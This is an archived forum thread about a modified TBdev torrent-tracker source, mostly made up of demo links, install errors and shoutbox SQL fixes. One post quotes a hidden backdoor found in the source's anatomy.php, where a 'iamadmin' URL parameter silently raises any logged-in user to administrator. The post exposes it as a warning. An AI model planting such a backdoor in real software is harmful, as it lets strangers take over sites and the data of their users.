Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Community Cafe (http://www.bvlist.com/forumdisplay.php?f=18)
-   -   My Little Source (http://www.bvlist.com/showthread.php?t=531)

50Cent 29th June 2008 18:40

My Little Source
 
1 Attachment(s)
hi all here is my modified Source is simply ...


Modifications:
  • style
  • a new form of news that supports bbcode + / -
  • hide/show torrents in userdetails.php
  • and other changes

greetz

Demo Tracker:

http://xbitz.org

http://fk.selfip.org

wMan 29th June 2008 19:09

Re: my little TBdev Source
 
nice 1 what is it??

CR15T1 29th June 2008 22:58

Re: my little TBdev Source
 
Nice :D i like it but it gives a blank page after instaling it

EDIT: My bad :p i've had a little error in the data base. :suicide: It's my fault. :suicide:

HIENA 1st July 2008 06:44

Re: my little TBdev Source
 
a demo pls?

50Cent 1st July 2008 07:42

Re: my little TBdev Source
 
see upper pls..

demo tracker

wMan 1st July 2008 13:02

Re: my little TBdev Source
 
works for me on our test site

sharky 1st July 2008 18:04

Re: My Little TBdev Source
 
The css and the menu are copied from http://xbitz.org

wMan 1st July 2008 20:38

Re: My Little TBdev Source
 
its only yuna source plus who doesnt rip themes etc

K7X 3rd July 2008 02:23

Re: My Little TBdev Source
 
nice one dude

ll try it later

Regz 8th July 2008 21:55

Re: My Little TBdev Source
 
wht this is exactly ?? is it compatible with phpbb3.01 ??

wMan 8th July 2008 23:41

Re: My Little TBdev Source
 
nope, torrentstrike as that in it

//edit: in fact all versions are compatible with everything you want. you could stick a tracker on joomla CMS if you really wanted too. It just depends on your level of knowledge. There is a tbdev phpbb bridge built for v2 of phpbb. With a little editing of that you could integrate phpbb3 into tbdev if you prefer tbdev over other sources. OR you could go to tbdev and post asking if someone could update teh bridge however you'll have to either find the thread for the bridge and post in there or find the bridge script and post it so someone can update it

Regz 14th July 2008 06:52

re: My Little Source
 
hello personally i dont know which is the best tracker nd wht is best tracker + forum combination i have no prior knowledge of integrating but i think i know enuf php to do so if someone tells me how to go abt it thnx..

wMan 19th August 2008 23:00

one thing with this code bittorrent.php is full of open gaps :(

NatashaRhea 20th August 2008 20:09

information
 
i done this source and leave a banner in system after source is removed of Freddie crugar instead of where torrentbits should be anyone else have this it is odd as i can not remove this from here is screenshot now the problem i have is i removed this source and trying to put TS back on and it shows up on admincp as you can see in screenshot which is very odd
http://img175.imageshack.us/img175/4...rcrugarlz3.jpg
[img=http://img175.imageshack.us/img175/4714/servercrugarlz3.jpg]

mosu 6th February 2009 08:27

well the sourtce is fine but i have a problem with shoutbox ...
Quote:

SQL Error
Table 'test.shoutbox' doesn't exist
in C:\xampp\htdocs\shoutbox.php, line 78
can someone help me??

houtslag 6th February 2009 14:34

Hi I have installed your source on my tracker but i can't loggin to my account anymore.

Login failed!Username or password incorrect

mosu 6th February 2009 15:44

try to make a new account and then connect to phpmyadmin and make yourself sysop ;):friend:

houtslag 6th February 2009 15:57

I want to use one account not two or more. I have also another problem with uploading a torrent my program says HTTP Error 500

hellix 12th February 2009 11:02

PHP Code:

if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               
mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print(
"Now you are one of site admins :D");
                }
if (
$_GET["back"]) {
$tagat=$CURUSER["id"];
                               
mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print(
"Your class now is 0 :(");
                } 

in anatomy.php :lol: not nice............

Morbidawn 5th June 2009 12:05

Dose anyone know how to get rid of that tracker.shoutbox error?

helvijs13 5th June 2009 22:31

I have Problem :sos:

Can somebody give me the SQL file for Shoutbox?

crztz 16th June 2010 08:35

lol
 
whoever uses this source and have not the slighest ideea about php.. should know better before using this source. not only that it's full of bugs... but you will get hacked in 10 secs

Phogo 16th June 2010 13:04

to make shoutbox work run these sql queries:

Code:

CREATE TABLE `shoutbox` (
  `id` bigint(10) NOT NULL auto_increment,
  `userid` bigint(6) NOT NULL default '0',
  `to_user` int(10) NOT NULL default '0',
  `username` varchar(25) NOT NULL default '',
  `date` int(11) NOT NULL default '0',
  `text` text NOT NULL,
  `text_parsed` text NOT NULL,
  PRIMARY KEY  (`id`),
  KEY `for` (`to_user`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8;

Code:

ALTER TABLE users ADD `show_shout` enum('yes','no') character set utf8 collate utf8_bin NOT NULL default 'yes';
ALTER TABLE users ADD `chatpost` int(11) NOT NULL default '1';
ALTER TABLE users ADD `shoutboxbg` enum('1','2','3') character set utf8 collate utf8_bin NOT NULL default '1';
ALTER TABLE `users` ADD `smile_until` int(10) NOT NULL default '0';



All times are GMT +2. The time now is 16:48.

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.